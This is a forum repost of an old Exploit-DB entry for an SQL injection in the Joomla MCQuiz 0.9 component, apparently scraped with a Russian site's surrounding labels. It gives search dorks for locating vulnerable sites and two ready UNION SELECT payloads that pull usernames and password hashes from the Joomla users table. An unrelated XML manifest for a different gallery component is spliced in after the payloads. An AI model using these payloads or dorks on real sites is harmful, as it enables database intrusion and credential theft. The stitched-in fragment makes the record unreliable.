Exploit Joomla! Component MCQuiz 0.9 Final - 'tid' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5118
Проверка EDB
  1. Пройдено
Автор
S@BUN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-0800
Дата публикации
2008-02-14
Код:
###############################################################
#
# joomla SQL Injection(com_mcquiz)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
# http://www.milw0rm.com/author/1334
#
# MAÄ°L : [email protected]
#
#
################################################################
#
# DORK 1 : allinurl: com_mcquiz "tid"
#
# DORK 2 : allinurl: com_mcquiz
#
################################################################

ATTACKER CAN SEE PASSWORD AND USERNAME UNDER PAGE

EXAMPLE=www.xxxxx.com/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid= [EXPLOÄ°T]

EXPLOIT=1=

1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),0x3a/**/from/**/jos_users/*

EXPLOÄ°T=2=

1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*

################################################################
# S@BUN               i AM NOT HACKER                     S@BUN
################################################################

	<name>paxxgallery</name>
	<author>Tobias Floery</author>
	<copyright>(c) Tobias Floery</copyright>
	<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>
	<authorEmail>[email protected]</authorEmail>

	<authorUrl>www.floery.net</authorUrl>
	<version>0.2</version>
	<creationDate>07.01.2006</creationDate>
	<description>
		<![CDATA[
		<h1>The PHP AjaX Gallery</h1>
		PAXXGallery is a PHP and JS Gallery Component for Joomla using AJAX Technology. 
		The component is designed to work even with Safe- Mode: ON! servers and a FTP Upload is integrated.
		]]>
	</description>

# milw0rm.com [2008-02-14]
 
Источник
www.exploit-db.com

Похожие темы